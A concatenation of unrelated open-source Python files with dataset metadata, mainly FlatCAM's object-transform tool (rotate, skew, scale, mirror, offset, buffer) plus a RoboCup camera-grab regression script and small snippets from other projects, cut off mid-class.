            raise RuntimeError(
                'Sharepoint api only works on Microsoft Graph API')

        return Sharepoint(parent=self, main_resource=resource)

    def planner(self, *, resource=''):
        """ Get an instance to read information from Microsoft planner """
        if not isinstance(self.protocol, MSGraphProtocol):
            # TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
            raise RuntimeError(
                'planner api only works on Microsoft Graph API')

        return Planner(parent=self, main_resource=resource)
1bcfb1be64aefa847642b99db29a5ff5cfbc73b9 | 292 | py | Python | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | client_code/routing/__init__.py | juanpaul101/anvil-extras | 580bed42128653394494ed0f210a7a918278be30 | [
"MIT"
] | null | null | null | # SPDX-License-Identifier: MIT
#
# Copyright (c) 2021 The Anvil Extras project team members listed at
# https://github.com/anvilistas/anvil-extras/graphs/contributors
#
# This software is published at https://github.com/anvilistas/anvil-extras
__version__ = "1.5.1"
from ._routing import *
| 26.545455 | 74 | 0.763699 |
92ddb519b2f65c6f546e2bfbbe9999c6a45a9e5f | 3,603 | py | Python | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 2 | 2021-01-15T13:27:19.000Z | 2021-08-04T08:40:52.000Z | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | null | null | null | scripts/testAllGrabs.py | Falcons-Robocup/code | 2281a8569e7f11cbd3238b7cc7341c09e2e16249 | [
"Apache-2.0"
] | 5 | 2018-05-01T10:39:31.000Z | 2022-03-25T03:02:35.000Z | #!/usr/bin/env python3
#
# Jan Feitsma, december 2019
import sys, time
import argparse
from testGrabs import TestGrabs, report
if __name__ == '__main__':
    # Argument parsing.
    descriptionTxt = """Regression-test the multiCam software on ALL available grabs. Write a small report. Example partial output:
test 1/54: r1 20181030_212155 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 2/54: r1 20190223_135008 ... robotpos=(-0.00,-0.00, 0.807) ball=(-0.27,-0.74, 0.00) #obst=0 bposs=False
test 3/54: r1 20190427_160053 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 4/54: r2 20180619_214554 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 5/54: r2 20180809_223758 ... robotpos=(-4.49,-7.50, 6.165) ball=(-3.26,-7.84, 0.00) #obst=1 bposs=False
test 6/54: r2 20180809_223759 ... robotpos=n/a ball=n/a #obst=0 bposs=False
test 7/54: r2 20180809_223800 ... robotpos=(-4.48,-7.52, 6.166) ball=(-3.26,-8.91, 0.00) #obst=1 bposs=False
...
Note: this test uses worldModel for the final (time-averaged) interpretation, since it is too tricky to reliably interpret the RTDB vision output buffers. Perhaps it would be worthwile to address this issue towards creating a vision-only option?
See also: testGrabs.py (to run a single set of grabs)."""
    parser = argparse.ArgumentParser(description=descriptionTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-v', '--verbose', help='print each command/action', action='store_true')
    parser.add_argument('-m', '--make', help='first make the tools', action='store_true')
    parser.add_argument('-M', '--cleanmake', help='first clean make the tools', action='store_true')
    parser.add_argument('-t', '--timeout', help='timeout before a test iteration is ended', type=float, default=15.0)
    parser.add_argument('-b', '--block', help='instead of using timeout, block each iteration until multiCam GUI is shut down by user', action='store_true')
    parser.add_argument('-s', '--start', help='start at given grab index', type=int, default=1)
    # TODO: speedup getting a lock etc. such that iteration timeout can be reduced? 10 seconds is apparently not enough
    args = parser.parse_args()

    # setup TestGrabs object, suppress output
    tester = TestGrabs(args.verbose, True)

    # build?
    if args.make or args.cleanmake:
        tester.make(args.cleanmake)

    # create the queue of grabs to be tested
    # robot numbers 1..19 are scanned; robots without grabs yield no timestamps
    testqueue = []
    for robot in range(1, 20):
        timestamps = tester.findGrabTimestamps(robot)
        for timestamp in timestamps:
            testqueue.append((robot, timestamp))

    # run the queue, optionally resuming at --start (1-based index)
    print("")
    count = args.start - 1
    for (robot, timestamp) in testqueue[(args.start-1):]:
        count += 1
        grabs = tester.getGrabs(robot, timestamp)
        # '{n}' expands to a newline only in verbose mode so the result is
        # appended on the same line in the compact report
        print("{n}test {:2d}/{:2d}: r{} {} ... {n}".format(count, len(testqueue), robot, timestamp, n=["","\n"][args.verbose]), end="", flush=True)
        tester.run(robot, grabs, block=args.block)
        if not args.block:
            # wait a few seconds before shutting down
            time.sleep(args.timeout)
            tester.shutdown(exit=False)
        # inspect RTDB contents
        if args.verbose:
            print("{n}test {:2d}/{:2d}: r{} {} result: ".format(count, len(testqueue), robot, timestamp, n=["","\n"][args.verbose]), end="")
        print(report(robot))

    # cleanup
    tester.shutdown(exit=True)
| 50.041667 | 245 | 0.640577 |
b9deb4c16e0db60a9fb616d86411e9b44e1032c9 | 41,449 | py | Python | appTools/ToolTransform.py | DannyPol/flatcam | 25a8634d0658e98b7fae31a095f8bef40c1b3067 | [
"MIT"
] | 1 | 2022-02-11T06:19:34.000Z | 2022-02-11T06:19:34.000Z | appTools/ToolTransform.py | MRemy2/FlatCam | d4f941335ca8a8d5351aab23b396f99da06a9029 | [
"MIT"
] | null | null | null | appTools/ToolTransform.py | MRemy2/FlatCam | d4f941335ca8a8d5351aab23b396f99da06a9029 | [
"MIT"
] | null | null | null | # ##########################################################
# FlatCAM: 2D Post-processing for Manufacturing #
# File Author: Marius Adrian Stanciu (c) #
# Date: 3/10/2019 #
# MIT Licence #
# ##########################################################
from PyQt5 import QtWidgets, QtGui, QtCore
from appTool import AppTool
from appGUI.GUIElements import FCDoubleSpinner, FCCheckBox, FCButton, OptionalInputSection, FCComboBox, \
NumericalEvalTupleEntry, FCLabel
import numpy as np
import gettext
import appTranslation as fcTranslate
import builtins
fcTranslate.apply_language('strings')
if '_' not in builtins.__dict__:
_ = gettext.gettext
class ToolTransform(AppTool):
    def __init__(self, app):
        """
        :param app: the main application instance; provides defaults,
            the object collection and the GUI.
        """
        AppTool.__init__(self, app)

        # number of decimals used when displaying/editing float values
        self.decimals = self.app.decimals

        # #############################################################################
        # ######################### Tool GUI ##########################################
        # #############################################################################
        self.ui = TransformUI(layout=self.layout, app=self.app)
        self.toolName = self.ui.toolName

        # ## Signals
        # reference selection widgets
        self.ui.ref_combo.currentIndexChanged.connect(self.ui.on_reference_changed)
        self.ui.type_obj_combo.currentIndexChanged.connect(self.on_type_obj_index_changed)
        self.ui.point_button.clicked.connect(self.on_add_coords)

        # one button per transform action
        self.ui.rotate_button.clicked.connect(self.on_rotate)

        self.ui.skewx_button.clicked.connect(self.on_skewx)
        self.ui.skewy_button.clicked.connect(self.on_skewy)

        self.ui.scalex_button.clicked.connect(self.on_scalex)
        self.ui.scaley_button.clicked.connect(self.on_scaley)

        self.ui.offx_button.clicked.connect(self.on_offx)
        self.ui.offy_button.clicked.connect(self.on_offy)

        self.ui.flipx_button.clicked.connect(self.on_flipx)
        self.ui.flipy_button.clicked.connect(self.on_flipy)

        self.ui.buffer_button.clicked.connect(self.on_buffer_by_distance)
        self.ui.buffer_factor_button.clicked.connect(self.on_buffer_by_factor)

        # restores the form to default values
        self.ui.reset_button.clicked.connect(self.set_tool_ui)
def run(self, toggle=True):
self.app.defaults.report_usage("ToolTransform()")
if toggle:
# if the splitter is hidden, display it, else hide it but only if the current widget is the same
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
else:
try:
if self.app.ui.tool_scroll_area.widget().objectName() == self.toolName:
# if tab is populated with the tool but it does not have the focus, focus on it
if not self.app.ui.notebook.currentWidget() is self.app.ui.tool_tab:
# focus on Tool Tab
self.app.ui.notebook.setCurrentWidget(self.app.ui.tool_tab)
else:
self.app.ui.splitter.setSizes([0, 1])
except AttributeError:
pass
else:
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
AppTool.run(self)
self.set_tool_ui()
self.app.ui.notebook.setTabText(2, _("Transform Tool"))
def install(self, icon=None, separator=None, **kwargs):
    """Register the tool in the application menu/toolbar with the Alt+T shortcut.

    Thin delegation to AppTool.install; all extra keyword arguments are
    forwarded unchanged.
    """
    AppTool.install(self, icon, separator, shortcut='Alt+T', **kwargs)
def set_tool_ui(self):
    """Reset every entry of the Transform tool to its configured default and
    hide the reference-point widgets (shown again by on_reference_changed)."""
    defaults = self.app.defaults

    # (widget, defaults key) pairs, applied in declaration order
    default_map = (
        (self.ui.ref_combo, "tools_transform_reference"),
        (self.ui.type_obj_combo, "tools_transform_ref_object"),
        (self.ui.point_entry, "tools_transform_ref_point"),
        (self.ui.rotate_entry, "tools_transform_rotate"),
        (self.ui.skewx_entry, "tools_transform_skew_x"),
        (self.ui.skewy_entry, "tools_transform_skew_y"),
        (self.ui.skew_link_cb, "tools_transform_skew_link"),
        (self.ui.scalex_entry, "tools_transform_scale_x"),
        (self.ui.scaley_entry, "tools_transform_scale_y"),
        (self.ui.scale_link_cb, "tools_transform_scale_link"),
        (self.ui.offx_entry, "tools_transform_offset_x"),
        (self.ui.offy_entry, "tools_transform_offset_y"),
        (self.ui.buffer_entry, "tools_transform_buffer_dis"),
        (self.ui.buffer_factor_entry, "tools_transform_buffer_factor"),
        (self.ui.buffer_rounded_cb, "tools_transform_buffer_corner"),
    )
    for widget, key in default_map:
        widget.set_value(defaults[key])

    # initial state is hidden: "Origin"/"Selection" references need no extra input
    hidden_widgets = (
        self.ui.point_label, self.ui.point_entry, self.ui.point_button,
        self.ui.type_object_label, self.ui.type_obj_combo, self.ui.object_combo,
    )
    for widget in hidden_widgets:
        widget.hide()
def on_type_obj_index_changed(self, index):
    """Re-root the reference-object combo on the collection row matching the
    selected object type and remember the type name on the combo itself."""
    root_index = self.app.collection.index(index, 0, QtCore.QModelIndex())
    self.ui.object_combo.setRootModelIndex(root_index)
    self.ui.object_combo.setCurrentIndex(0)

    # map the (possibly translated) combo label back to the internal kind name
    kind_by_label = {
        _("Gerber"): "Gerber",
        _("Excellon"): "Excellon",
        _("Geometry"): "Geometry",
    }
    self.ui.object_combo.obj_type = kind_by_label[self.ui.type_obj_combo.get_value()]
def on_calculate_reference(self):
    """Compute the (x, y) reference point used by rotate/skew/scale/mirror.

    The meaning depends on the Reference combo index:
      0 "Origin"    -> (0, 0)
      1 "Selection" -> center of the bounding box of the selected objects
      2 "Point"     -> coordinates parsed from the point entry ("X, Y")
      3 "Object"    -> center of the bounding box of the chosen object

    :return: tuple (px, py) on success, or the string "fail" when no
        selection exists / the point entry cannot be parsed.
    """
    ref_val = self.ui.ref_combo.currentIndex()

    if ref_val == 0:  # "Origin" reference
        return 0, 0
    elif ref_val == 1:  # "Selection" reference
        sel_list = self.app.collection.get_selected()
        if sel_list:
            xmin, ymin, xmax, ymax = self.alt_bounds(obj_list=sel_list)
            px = (xmax + xmin) * 0.5
            py = (ymax + ymin) * 0.5
            return px, py
        else:
            self.app.inform.emit('[ERROR_NOTCL] %s' % _("No object is selected."))
            return "fail"
    elif ref_val == 2:  # "Point" reference
        # BUG FIX: was `self.uipoint_entry` (missing attribute -> AttributeError);
        # the widget lives on the UI object: `self.ui.point_entry`.
        point_val = self.ui.point_entry.get_value()
        try:
            # NOTE(security): eval() on user-typed text; tolerated here only because
            # the input comes from the local GUI, but a literal parser would be safer.
            px, py = eval('{}'.format(point_val))
            return px, py
        except Exception:
            self.app.inform.emit('[WARNING_NOTCL] %s' % _("Incorrect format for Point value. Needs format X,Y"))
            return "fail"
    else:  # "Object" reference
        obj_name = self.ui.object_combo.get_value()
        ref_obj = self.app.collection.get_by_name(obj_name)
        xmin, ymin, xmax, ymax = ref_obj.bounds()
        px = (xmax + xmin) * 0.5
        py = (ymax + ymin) * 0.5
        return px, py
def on_add_coords(self):
    """Copy the system-clipboard text into the reference-point entry."""
    clipboard_text = self.app.clipboard.text()
    self.ui.point_entry.set_value(clipboard_text)
def on_rotate(self):
    """Rotate-button handler: validate the angle, resolve the reference point
    and queue the actual rotation on a worker thread."""
    angle = float(self.ui.rotate_entry.get_value())
    if angle == 0:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("Rotate transformation can not be done for a value of 0."))
        return

    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return

    task = {'fcn': self.on_rotate_action, 'params': [angle, ref_point]}
    self.app.worker_task.emit(task)
def on_flipx(self):
    """Flip-on-X button handler.

    Note: the internal axis parameter is 'Y' — presumably the mirror axis is
    named after the coordinate it inverts, see on_flip — TODO confirm.
    """
    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return
    self.app.worker_task.emit({'fcn': self.on_flip, 'params': ['Y', ref_point]})
def on_flipy(self):
    """Flip-on-Y button handler (internal axis parameter 'X', mirroring
    on_flipx's convention)."""
    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return
    self.app.worker_task.emit({'fcn': self.on_flip, 'params': ['X', ref_point]})
def on_skewx(self):
    """Skew-X button handler: queue a skew job; when the Link checkbox is set
    the Y angle copies the X angle."""
    x_angle = float(self.ui.skewx_entry.get_value())
    if x_angle == 0:
        return

    y_angle = x_angle if self.ui.skew_link_cb.get_value() else 0

    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return

    task = {'fcn': self.on_skew, 'params': ['X', x_angle, y_angle, ref_point]}
    self.app.worker_task.emit(task)
def on_skewy(self):
    """Skew-Y button handler: queue a skew job with X angle fixed at 0
    (the Link checkbox only affects the Skew X handler)."""
    y_angle = float(self.ui.skewy_entry.get_value())
    if y_angle == 0:
        return

    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return

    task = {'fcn': self.on_skew, 'params': ['Y', 0, y_angle, ref_point]}
    self.app.worker_task.emit(task)
def on_scalex(self):
    """Scale-X button handler: reject degenerate factors (0 or 1) and queue a
    scale job; when the Link checkbox is set the Y factor copies X."""
    x_factor = float(self.ui.scalex_entry.get_value())
    if x_factor in (0, 1):
        self.app.inform.emit('[WARNING_NOTCL] %s' %
                             _("Scale transformation can not be done for a factor of 0 or 1."))
        return

    y_factor = x_factor if self.ui.scale_link_cb.get_value() else 1

    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return

    task = {'fcn': self.on_scale, 'params': ['X', x_factor, y_factor, ref_point]}
    self.app.worker_task.emit(task)
def on_scaley(self):
    """Scale-Y button handler: X factor fixed at 1; degenerate Y factors
    (0 or 1) are rejected with a warning."""
    y_factor = float(self.ui.scaley_entry.get_value())
    if y_factor in (0, 1):
        self.app.inform.emit('[WARNING_NOTCL] %s' %
                             _("Scale transformation can not be done for a factor of 0 or 1."))
        return

    ref_point = self.on_calculate_reference()
    if ref_point == 'fail':
        return

    task = {'fcn': self.on_scale, 'params': ['Y', 1, y_factor, ref_point]}
    self.app.worker_task.emit(task)
def on_offx(self):
    """Offset-X button handler: queue an X-axis offset job for a non-zero distance."""
    distance = float(self.ui.offx_entry.get_value())
    if distance == 0:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("Offset transformation can not be done for a value of 0."))
        return
    self.app.worker_task.emit({'fcn': self.on_offset, 'params': ['X', distance]})
def on_offy(self):
    """Offset-Y button handler: queue a Y-axis offset job for a non-zero distance."""
    distance = float(self.ui.offy_entry.get_value())
    if distance == 0:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("Offset transformation can not be done for a value of 0."))
        return
    self.app.worker_task.emit({'fcn': self.on_offset, 'params': ['Y', distance]})
def on_buffer_by_distance(self):
    """Queue a buffer job that grows/shrinks the selection by a distance.

    Join style 1 = rounded corners, 2 = square, following the checkbox.
    """
    distance = self.ui.buffer_entry.get_value()
    join_style = 1 if self.ui.buffer_rounded_cb.get_value() else 2
    self.app.worker_task.emit({'fcn': self.on_buffer_action, 'params': [distance, join_style]})
def on_buffer_by_factor(self):
    """Queue a buffer job driven by a percentage of the original size.

    The entry holds a percentage delta, converted here to a multiplicative
    factor (e.g. 10% -> 1.1). The trailing True flag tells on_buffer_action
    to interpret the value as a factor instead of a distance.
    """
    factor_value = 1 + self.ui.buffer_factor_entry.get_value() / 100.0
    join_style = 1 if self.ui.buffer_rounded_cb.get_value() else 2
    self.app.worker_task.emit({'fcn': self.on_buffer_action, 'params': [factor_value, join_style, True]})
def on_rotate_action(self, num, point):
    """Rotate every selected object by `num` degrees around `point`.

    Runs on a worker thread (queued via app.worker_task). CNCJob objects are
    skipped with an informational message; every transformed object records
    the applied angle in its options and is replotted.

    :param num: rotation angle in degrees
    :param point: (x, y) pivot of the rotation
    """
    obj_list = self.app.collection.get_selected()

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
        return
    else:
        # FIX: message read "Appying Rotate"; every sibling handler says "Applying ...".
        with self.app.proc_container.new(_("Applying Rotate")):
            try:
                px, py = point
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be rotated."))
                    else:
                        # sign is negated — presumably the GUI convention is
                        # positive = clockwise while the geometry kernel is CCW; TODO confirm
                        sel_obj.rotate(-num, point=(px, py))
                        self.app.app_obj.object_changed.emit(sel_obj)
                        # add information to the object that it was changed and how much
                        sel_obj.options['rotate'] = num
                        sel_obj.plot()
                self.app.inform.emit('[success] %s...' % _('Rotate done'))
            except Exception as e:
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
def on_flip(self, axis, point):
    """Mirror every selected object over `axis` relative to `point`.

    Worker-thread body for the Flip buttons. CNCJob objects are skipped.
    The recorded option name is the OPPOSITE axis ('mirror_y' for axis 'X')
    because the axis parameter names the coordinate that is inverted, not the
    axis flipped over (see on_flipx/on_flipy).
    """
    obj_list = self.app.collection.get_selected()

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s!' % _("No object is selected."))
        return
    else:
        with self.app.proc_container.new(_("Applying Flip")):
            try:
                px, py = point
                # execute mirroring
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be mirrored/flipped."))
                    else:
                        if axis == 'X':
                            sel_obj.mirror('X', (px, py))
                            # add information to the object that it was changed and how much
                            # the axis is reversed because of the reference
                            if 'mirror_y' in sel_obj.options:
                                sel_obj.options['mirror_y'] = not sel_obj.options['mirror_y']
                            else:
                                sel_obj.options['mirror_y'] = True
                            self.app.inform.emit('[success] %s...' % _('Flip on Y axis done'))
                        elif axis == 'Y':
                            sel_obj.mirror('Y', (px, py))
                            # add information to the object that it was changed and how much
                            # the axis is reversed because of the reference
                            if 'mirror_x' in sel_obj.options:
                                sel_obj.options['mirror_x'] = not sel_obj.options['mirror_x']
                            else:
                                sel_obj.options['mirror_x'] = True
                            self.app.inform.emit('[success] %s...' % _('Flip on X axis done'))
                        self.app.app_obj.object_changed.emit(sel_obj)
                        sel_obj.plot()
            except Exception as e:
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
def on_skew(self, axis, xvalue, yvalue, point):
    """Skew/shear every selected object by (xvalue, yvalue) degrees around `point`.

    Worker-thread body for the Skew buttons. Angles of 90/180 degrees (and a
    fully-zero pair) are rejected because the shear transform degenerates
    there. CNCJob objects are skipped.

    :param axis: 'X' or 'Y' — used only in the success message
    """
    obj_list = self.app.collection.get_selected()

    if xvalue in [90, 180] or yvalue in [90, 180] or xvalue == yvalue == 0:
        self.app.inform.emit('[WARNING_NOTCL] %s' %
                             _("Skew transformation can not be done for 0, 90 and 180 degrees."))
        return

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
        return
    else:
        with self.app.proc_container.new(_("Applying Skew")):
            try:
                px, py = point
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be skewed."))
                    else:
                        sel_obj.skew(xvalue, yvalue, point=(px, py))
                        # add information to the object that it was changed and how much
                        sel_obj.options['skew_x'] = xvalue
                        sel_obj.options['skew_y'] = yvalue
                        self.app.app_obj.object_changed.emit(sel_obj)
                        sel_obj.plot()
                self.app.inform.emit('[success] %s %s %s...' % (_('Skew on the'), str(axis), _("axis done")))
            except Exception as e:
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
def on_scale(self, axis, xfactor, yfactor, point=None):
    """Scale every selected object by (xfactor, yfactor) around `point`.

    Worker-thread body for the Scale buttons. CNCJob objects are skipped.
    NOTE(review): `point=None` would fail at the tuple unpacking below;
    callers always pass a concrete (x, y) — confirm the default is vestigial.

    :param axis: 'X' or 'Y' — used only in the success message
    """
    obj_list = self.app.collection.get_selected()

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
        return
    else:
        with self.app.proc_container.new(_("Applying Scale")):
            try:
                px, py = point
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be scaled."))
                    else:
                        sel_obj.scale(xfactor, yfactor, point=(px, py))
                        # add information to the object that it was changed and how much
                        sel_obj.options['scale_x'] = xfactor
                        sel_obj.options['scale_y'] = yfactor
                        self.app.app_obj.object_changed.emit(sel_obj)
                        sel_obj.plot()
                self.app.inform.emit('[success] %s %s %s...' % (_('Scale on the'), str(axis), _('axis done')))
            except Exception as e:
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
def on_offset(self, axis, num):
    """Translate every selected object by `num` units along `axis` ('X' or 'Y').

    Worker-thread body for the Offset buttons. CNCJob objects are skipped;
    each moved object records the applied offset in its options and is replotted.
    """
    obj_list = self.app.collection.get_selected()

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
        return
    else:
        with self.app.proc_container.new(_("Applying Offset")):
            try:
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be offset."))
                    else:
                        if axis == 'X':
                            sel_obj.offset((num, 0))
                            # add information to the object that it was changed and how much
                            sel_obj.options['offset_x'] = num
                        elif axis == 'Y':
                            sel_obj.offset((0, num))
                            # add information to the object that it was changed and how much
                            sel_obj.options['offset_y'] = num
                        self.app.app_obj.object_changed.emit(sel_obj)
                        sel_obj.plot()
                self.app.inform.emit('[success] %s %s %s...' % (_('Offset on the'), str(axis), _('axis done')))
            except Exception as e:
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
def on_buffer_action(self, value, join, factor=None):
    """Buffer (dilate/erode) every selected object.

    Worker-thread body for the Buffer buttons.

    :param value: buffer distance, or a multiplicative factor when `factor`
        is truthy (see on_buffer_by_factor)
    :param join: corner join style passed through to the object's buffer()
        (1 = rounded, 2 = square — set by the Rounded checkbox)
    :param factor: when truthy, `value` is interpreted as a scale factor
    Gerber/Excellon objects also regenerate their source file so exports
    stay consistent with the new geometry. CNCJob objects are skipped.
    """
    obj_list = self.app.collection.get_selected()

    if not obj_list:
        self.app.inform.emit('[WARNING_NOTCL] %s' % _("No object is selected."))
        return
    else:
        with self.app.proc_container.new(_("Applying Buffer")):
            try:
                for sel_obj in obj_list:
                    if sel_obj.kind == 'cncjob':
                        self.app.inform.emit(_("CNCJob objects can't be buffered."))
                    elif sel_obj.kind.lower() == 'gerber':
                        sel_obj.buffer(value, join, factor)
                        sel_obj.source_file = self.app.f_handlers.export_gerber(obj_name=sel_obj.options['name'],
                                                                                filename=None, local_use=sel_obj,
                                                                                use_thread=False)
                    elif sel_obj.kind.lower() == 'excellon':
                        sel_obj.buffer(value, join, factor)
                        sel_obj.source_file = self.app.f_handlers.export_excellon(obj_name=sel_obj.options['name'],
                                                                                  filename=None, local_use=sel_obj,
                                                                                  use_thread=False)
                    elif sel_obj.kind.lower() == 'geometry':
                        sel_obj.buffer(value, join, factor)

                    self.app.app_obj.object_changed.emit(sel_obj)
                    sel_obj.plot()
                self.app.inform.emit('[success] %s...' % _('Buffer done'))
            except Exception as e:
                self.app.log.debug("ToolTransform.on_buffer_action() --> %s" % str(e))
                self.app.inform.emit('[ERROR_NOTCL] %s: %s.' % (_("Action was not executed"), str(e)))
                return
@staticmethod
def alt_bounds(obj_list):
"""
Returns coordinates of rectangular bounds
of an object with geometry: (xmin, ymin, xmax, ymax).
"""
def bounds_rec(lst):
minx = np.Inf
miny = np.Inf
maxx = -np.Inf
maxy = -np.Inf
try:
for obj in lst:
if obj.kind != 'cncjob':
minx_, miny_, maxx_, maxy_ = bounds_rec(obj)
minx = min(minx, minx_)
miny = min(miny, miny_)
maxx = max(maxx, maxx_)
maxy = max(maxy, maxy_)
return minx, miny, maxx, maxy
except TypeError:
# it's an object, return it's bounds
return lst.bounds()
return bounds_rec(obj_list)
class TransformUI:
    """GUI layer of the Object Transform tool.

    Builds all widgets into the layout supplied by the tool and exposes them
    as attributes; the tool object wires the signals. Fixes applied here:
    the "Flip on Y" tooltip wrongly said "over the X axis" (copy/paste).
    """

    toolName = _("Object Transform")
    rotateName = _("Rotate")
    skewName = _("Skew/Shear")
    scaleName = _("Scale")
    flipName = _("Mirror (Flip)")
    offsetName = _("Offset")
    bufferName = _("Buffer")

    def __init__(self, layout, app):
        self.app = app
        self.decimals = self.app.decimals
        self.layout = layout

        # ## Title
        title_label = FCLabel("%s" % self.toolName)
        title_label.setStyleSheet("""
                                  QLabel
                                  {
                                      font-size: 16px;
                                      font-weight: bold;
                                  }
                                  """)
        self.layout.addWidget(title_label)
        self.layout.addWidget(FCLabel(""))

        # ## Layout
        grid0 = QtWidgets.QGridLayout()
        self.layout.addLayout(grid0)
        grid0.setColumnStretch(0, 0)
        grid0.setColumnStretch(1, 1)
        grid0.setColumnStretch(2, 0)
        grid0.addWidget(FCLabel(''))

        # Reference
        ref_label = FCLabel('%s:' % _("Reference"))
        ref_label.setToolTip(
            _("The reference point for Rotate, Skew, Scale, Mirror.\n"
              "Can be:\n"
              "- Origin -> it is the 0, 0 point\n"
              "- Selection -> the center of the bounding box of the selected objects\n"
              "- Point -> a custom point defined by X,Y coordinates\n"
              "- Object -> the center of the bounding box of a specific object")
        )
        self.ref_combo = FCComboBox()
        self.ref_items = [_("Origin"), _("Selection"), _("Point"), _("Object")]
        self.ref_combo.addItems(self.ref_items)
        grid0.addWidget(ref_label, 0, 0)
        grid0.addWidget(self.ref_combo, 0, 1, 1, 2)

        self.point_label = FCLabel('%s:' % _("Value"))
        self.point_label.setToolTip(
            _("A point of reference in format X,Y.")
        )
        self.point_entry = NumericalEvalTupleEntry()
        grid0.addWidget(self.point_label, 1, 0)
        grid0.addWidget(self.point_entry, 1, 1, 1, 2)

        self.point_button = FCButton(_("Add"))
        self.point_button.setToolTip(
            _("Add point coordinates from clipboard.")
        )
        grid0.addWidget(self.point_button, 2, 0, 1, 3)

        # Type of object to be used as reference
        self.type_object_label = FCLabel('%s:' % _("Type"))
        self.type_object_label.setToolTip(
            _("The type of object used as reference.")
        )
        self.type_obj_combo = FCComboBox()
        self.type_obj_combo.addItem(_("Gerber"))
        self.type_obj_combo.addItem(_("Excellon"))
        self.type_obj_combo.addItem(_("Geometry"))
        self.type_obj_combo.setItemIcon(0, QtGui.QIcon(self.app.resource_location + "/flatcam_icon16.png"))
        self.type_obj_combo.setItemIcon(1, QtGui.QIcon(self.app.resource_location + "/drill16.png"))
        self.type_obj_combo.setItemIcon(2, QtGui.QIcon(self.app.resource_location + "/geometry16.png"))
        grid0.addWidget(self.type_object_label, 3, 0)
        grid0.addWidget(self.type_obj_combo, 3, 1, 1, 2)

        # Object to be used as reference
        self.object_combo = FCComboBox()
        self.object_combo.setModel(self.app.collection)
        self.object_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
        self.object_combo.is_last = True
        self.object_combo.setToolTip(
            _("The object used as reference.\n"
              "The used point is the center of it's bounding box.")
        )
        grid0.addWidget(self.object_combo, 4, 0, 1, 3)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 5, 0, 1, 3)

        # ## Rotate Title
        rotate_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.rotateName)
        grid0.addWidget(rotate_title_label, 6, 0, 1, 3)

        self.rotate_label = FCLabel('%s:' % _("Angle"))
        self.rotate_label.setToolTip(
            _("Angle, in degrees.\n"
              "Float number between -360 and 359.\n"
              "Positive numbers for CW motion.\n"
              "Negative numbers for CCW motion.")
        )
        self.rotate_entry = FCDoubleSpinner(callback=self.confirmation_message)
        self.rotate_entry.set_precision(self.decimals)
        self.rotate_entry.setSingleStep(45)
        self.rotate_entry.setWrapping(True)
        self.rotate_entry.set_range(-360, 360)
        # self.rotate_entry.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
        self.rotate_button = FCButton(_("Rotate"))
        self.rotate_button.setToolTip(
            _("Rotate the selected object(s).\n"
              "The point of reference is the middle of\n"
              "the bounding box for all selected objects.")
        )
        self.rotate_button.setMinimumWidth(90)
        grid0.addWidget(self.rotate_label, 7, 0)
        grid0.addWidget(self.rotate_entry, 7, 1)
        grid0.addWidget(self.rotate_button, 7, 2)

        separator_line = QtWidgets.QFrame()
        separator_line.setFrameShape(QtWidgets.QFrame.HLine)
        separator_line.setFrameShadow(QtWidgets.QFrame.Sunken)
        grid0.addWidget(separator_line, 8, 0, 1, 3)

        # ## Skew Title
        skew_title_label = FCLabel("<font size=3><b>%s</b></font>" % self.skewName)
